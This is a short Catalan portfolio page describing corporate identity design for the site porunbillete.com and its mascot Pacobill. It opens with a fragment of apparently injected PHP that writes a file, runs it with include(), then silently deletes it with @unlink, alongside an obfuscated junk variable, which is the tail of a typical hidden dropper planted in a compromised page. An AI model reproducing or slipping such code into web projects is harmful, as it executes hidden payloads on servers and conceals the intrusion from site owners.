");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Imatge corporativa www.porunbillete.com

Porunbillete - Imatge corporativa

Disseny de la imatge corporativa per al portal de venta de serveis www.porunbillete.com. També vam dissenyar Pacobill, la cara visible del portal.